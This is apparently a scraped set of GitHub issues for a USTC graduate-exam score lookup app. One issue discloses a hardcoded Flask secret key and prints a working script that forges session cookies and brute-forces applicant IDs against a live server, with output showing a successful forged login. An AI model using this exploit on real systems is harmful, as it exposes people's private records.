csflyer / ustcrank Goto Github PK
View Code? Open in Web Editor NEW中科大 (USTC) 研究生入学考试成绩与排名查询
中科大 (USTC) 研究生入学考试成绩与排名查询
操作系统:centos8
python版本:3.10.3
pip版本:23.0.1
错误信息:
ERROR: Cannot install -r pip.txt (line 31) and urllib3==1.26.5 because these package versions have conflicting dependencies.
The conflict is caused by:
The user requested urllib3==1.26.5
requests 2.23.0 depends on urllib3!=1.25.0, !=1.25.1, <1.26 and >=1.21.1
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
不过在windows上安装没有出现依赖问题
我在部署时是将requirements的版本要求给删除了,不知道这个是我的环境问题还是依赖确实存在问题
应该弄一个不计政治和英语的排名就比较直观
是不是查了分的人的数据才参与排名?所以这个排名实际上会偏高?
第一页有
第二页有
还有几对重复记录,用excel发现的。。。
成绩表.xls
python不太懂,可能检查一下考号重复的记录,删掉就行了
# 表单 防CSRF
app.config['SECRET_KEY'] = 'USTC'
不知道你在防什么
参见官方文档
# Set the secret key to some random bytes. Keep this really secret!
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
利用poc:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/2/27 11:57
# @Author : Dawnnnnnn
# @Contact: [email protected]
import requests
import zlib
from itsdangerous import base64_decode
import ast
from flask.sessions import SecureCookieSessionInterface
secret_key = 'USTC'
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
def session_cookie_encoder(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error]{}".format(e)
def session_cookie_decoder(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if (secret_key == None):
compressed = False
payload = session_cookie_value
if payload.startswith(b'.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error]{}".format(e)
for i in range(103581210008000, 103581210015886):
data = {'_user_id': str(i)}
print(i)
brute_session = (session_cookie_encoder(secret_key, f"{data}"))
headers = {
"Cookie": f'session={brute_session}'
}
res = requests.get('http://8.129.43.182/score', headers=headers, allow_redirects=False)
if res.status_code == 200:
print(brute_session)
print(res.text)
break
else:
print(session_cookie_decoder(res.cookies.get('session'), secret_key))
结果:
103581210008105
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008105'}
103581210008106
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008106'}
103581210008107
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008107'}
103581210008108
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008108'}
103581210008109
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008109'}
103581210008110
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008110'}
103581210008111
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008111'}
103581210008112
eyJfdXNlcl9pZCI6IjEwMzU4MTIxMDAwODExMiJ9.YDpJPw.NpdKnMUxImNGxkKF8WkgePUMukY
<!DOCTYPE html>
<html>
<head>
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.